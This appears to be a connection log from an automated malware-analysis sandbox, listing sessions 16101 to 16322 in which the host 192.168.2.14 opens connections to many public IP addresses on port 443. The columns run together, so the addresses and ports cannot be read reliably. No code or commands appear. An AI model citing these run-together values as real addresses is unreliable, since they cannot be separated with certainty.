                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16101192.168.2.1444970171.139.175.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16102192.168.2.1459760170.28.220.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16103192.168.2.1459284128.50.7.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16104192.168.2.145029448.127.82.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16105192.168.2.1447970149.7.33.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16106192.168.2.1453396210.5.76.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16107192.168.2.144130479.44.73.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16108192.168.2.145987037.190.131.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16109192.168.2.1440788151.128.38.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16110192.168.2.1457272174.164.99.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16111192.168.2.145755024.125.171.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16112192.168.2.143814674.145.205.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16113192.168.2.143860837.36.154.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16114192.168.2.143289254.81.198.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16115192.168.2.1436254154.4.211.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16116192.168.2.1456150162.64.242.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16117192.168.2.14333741.188.40.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16118192.168.2.1445708193.43.221.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16119192.168.2.1444488209.66.80.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16120192.168.2.1450764174.188.198.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16121192.168.2.145860662.230.189.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16122192.168.2.1443258153.144.197.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16123192.168.2.1450360187.8.67.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16124192.168.2.1452576177.24.128.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16125192.168.2.1435370116.94.47.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16126192.168.2.1458664114.166.95.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16127192.168.2.145270681.234.98.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16128192.168.2.143858697.22.79.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16129192.168.2.1443336166.155.175.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16130192.168.2.1459790108.131.44.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16131192.168.2.144251023.41.105.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16132192.168.2.1441472202.219.174.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16133192.168.2.1446272104.149.44.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16134192.168.2.1433162122.199.253.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16135192.168.2.1445740186.208.34.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16136192.168.2.1456476141.246.45.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16137192.168.2.143378623.47.81.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16138192.168.2.145505636.21.183.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16139192.168.2.145675867.134.248.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16140192.168.2.1450404196.198.48.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16141192.168.2.1449240104.183.190.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16142192.168.2.143688417.98.95.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16143192.168.2.144923292.171.252.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16144192.168.2.145552483.218.59.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16145192.168.2.144802870.83.6.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16146192.168.2.1449770138.106.201.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16147192.168.2.144168814.4.92.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16148192.168.2.1458226174.192.13.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16149192.168.2.144374487.26.85.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16150192.168.2.1450906105.144.9.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16151192.168.2.1459250153.108.194.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16152192.168.2.143886643.28.132.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16153192.168.2.1441494174.55.207.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16154192.168.2.1460660144.143.37.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16155192.168.2.144932035.61.228.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16156192.168.2.143869423.53.68.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16157192.168.2.1454002218.146.49.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16158192.168.2.145345659.98.32.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16159192.168.2.1444606205.142.177.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16160192.168.2.1435032165.228.148.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16161192.168.2.1453054133.119.75.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16162192.168.2.1453950183.101.229.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16163192.168.2.143567859.179.209.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16164192.168.2.144161867.50.216.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16165192.168.2.1457864160.11.242.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16166192.168.2.1449316104.158.216.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16167192.168.2.144816213.188.188.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16168192.168.2.1450758195.72.59.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16169192.168.2.145104214.42.85.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16170192.168.2.144776494.250.232.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16171192.168.2.144899488.99.45.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16172192.168.2.145928485.82.140.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16173192.168.2.144819083.232.83.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16174192.168.2.144295867.71.22.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16175192.168.2.145624664.233.11.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16176192.168.2.1443562110.15.29.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16177192.168.2.1439544123.119.116.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16178192.168.2.144348643.91.75.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16179192.168.2.1435408184.85.242.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16180192.168.2.1453580185.177.89.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16181192.168.2.144431869.128.177.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16182192.168.2.1460612187.149.26.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16183192.168.2.144986257.253.43.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16184192.168.2.1445468140.87.101.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16185192.168.2.1433784178.102.171.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16186192.168.2.143712027.170.73.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16187192.168.2.145592696.58.161.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16188192.168.2.143616412.72.4.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16189192.168.2.1443068168.171.196.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16190192.168.2.143668437.218.234.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16191192.168.2.145123243.207.48.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16192192.168.2.1442862198.220.242.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16193192.168.2.1441824160.230.23.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16194192.168.2.14560465.133.84.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16195192.168.2.14385381.0.61.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16196192.168.2.1453936106.53.117.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16197192.168.2.1450080218.214.107.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16198192.168.2.1445136177.36.71.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16199192.168.2.144509891.80.33.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16200192.168.2.1436206155.212.108.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16201192.168.2.1443778128.107.185.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16202192.168.2.1443598176.125.117.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16203192.168.2.144594247.231.43.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16204192.168.2.144354278.86.245.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16205192.168.2.1441518191.209.214.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16206192.168.2.143405020.254.10.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16207192.168.2.14518685.233.128.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16208192.168.2.1443396123.159.89.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16209192.168.2.143823676.185.21.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16210192.168.2.1452160143.48.118.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16211192.168.2.1443310216.52.142.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16212192.168.2.1434788205.172.184.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16213192.168.2.1435052129.143.140.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16214192.168.2.1457400208.64.62.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16215192.168.2.1452576131.194.6.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16216192.168.2.1458108193.255.176.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16217192.168.2.1441684156.195.84.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16218192.168.2.144082450.29.134.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16219192.168.2.1435016177.240.34.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16220192.168.2.144585246.179.181.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16221192.168.2.144721293.82.214.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16222192.168.2.1438558154.107.152.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16223192.168.2.1451200143.207.68.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16224192.168.2.14596904.153.254.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16225192.168.2.1455692167.171.187.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16226192.168.2.1436958113.218.225.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16227192.168.2.1435086134.154.40.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16228192.168.2.1456808122.231.205.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16229192.168.2.1455344105.208.166.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16230192.168.2.1434266185.75.78.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16231192.168.2.143325225.100.116.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16232192.168.2.1440112182.60.231.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16233192.168.2.143985287.203.125.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16234192.168.2.143297034.195.205.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16235192.168.2.1460480100.154.114.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16236192.168.2.1435418207.116.57.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16237192.168.2.143907646.253.153.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16238192.168.2.1456674134.226.96.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16239192.168.2.1452930107.17.242.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16240192.168.2.1450490166.173.39.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16241192.168.2.1453630199.51.210.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16242192.168.2.1435690180.193.160.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16243192.168.2.14507825.253.153.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16244192.168.2.144423860.208.77.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16245192.168.2.144439424.206.229.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16246192.168.2.1446942106.103.126.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16247192.168.2.1457660172.90.230.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16248192.168.2.1454158193.1.159.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16249192.168.2.145956269.227.185.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16250192.168.2.1444714105.17.172.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16251192.168.2.144340886.77.5.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16252192.168.2.145820090.130.17.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16253192.168.2.1447784134.45.69.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16254192.168.2.145563254.181.129.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16255192.168.2.1454118223.57.243.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16256192.168.2.145550257.53.42.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16257192.168.2.143623470.124.1.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16258192.168.2.145376835.117.67.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16259192.168.2.1435650179.20.25.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16260192.168.2.145305031.206.88.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16261192.168.2.1450032195.109.48.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16262192.168.2.1445254112.213.97.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16263192.168.2.144592246.74.76.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16264192.168.2.1455148164.125.108.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16265192.168.2.1440984209.195.77.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16266192.168.2.1434282154.182.253.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16267192.168.2.143796093.128.157.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16268192.168.2.145636444.80.75.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16269192.168.2.144081242.184.85.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16270192.168.2.1445596141.49.160.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16271192.168.2.1441642129.249.149.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16272192.168.2.143440057.126.43.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16273192.168.2.143882257.205.111.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16274192.168.2.143722897.22.138.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16275192.168.2.1435672180.84.107.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16276192.168.2.1449676120.255.47.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16277192.168.2.1437940100.206.200.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16278192.168.2.143936099.226.76.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16279192.168.2.14475189.233.54.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16280192.168.2.145335867.117.127.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16281192.168.2.1440964205.129.202.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16282192.168.2.146065688.142.40.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16283192.168.2.144785487.189.136.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16284192.168.2.144935225.22.125.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16285192.168.2.1448210150.163.215.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16286192.168.2.145590494.154.24.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16287192.168.2.143684818.177.176.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16288192.168.2.144445835.151.64.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16289192.168.2.1438288191.62.12.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16290192.168.2.1442976198.8.145.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16291192.168.2.143356469.185.240.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16292192.168.2.144444866.97.198.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16293192.168.2.143342083.158.52.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16294192.168.2.144803093.15.99.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16295192.168.2.145795893.57.53.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16296192.168.2.1452358137.35.8.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16297192.168.2.1458418181.156.226.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16298192.168.2.1437352133.169.7.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16299192.168.2.1444742181.102.154.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16300192.168.2.144468444.241.90.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16301192.168.2.143640424.31.203.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16302192.168.2.144882059.126.119.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16303192.168.2.1449578178.179.228.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16304192.168.2.1447916143.251.40.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16305192.168.2.1456968173.248.239.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16306192.168.2.146042414.88.192.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16307192.168.2.1434948166.219.221.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16308192.168.2.143968462.252.50.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16309192.168.2.1452674139.95.87.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16310192.168.2.145249843.204.213.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16311192.168.2.1444482139.218.56.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16312192.168.2.144571434.157.219.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16313192.168.2.143602257.212.35.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16314192.168.2.1432984124.224.37.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16315192.168.2.144639238.29.121.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16316192.168.2.143979668.163.28.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16317192.168.2.143945465.156.111.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16318192.168.2.145761672.185.32.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16319192.168.2.145384048.185.180.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16320192.168.2.143758884.15.55.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16321192.168.2.145557281.171.245.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16322192.168.2.143353618.0.144.40443
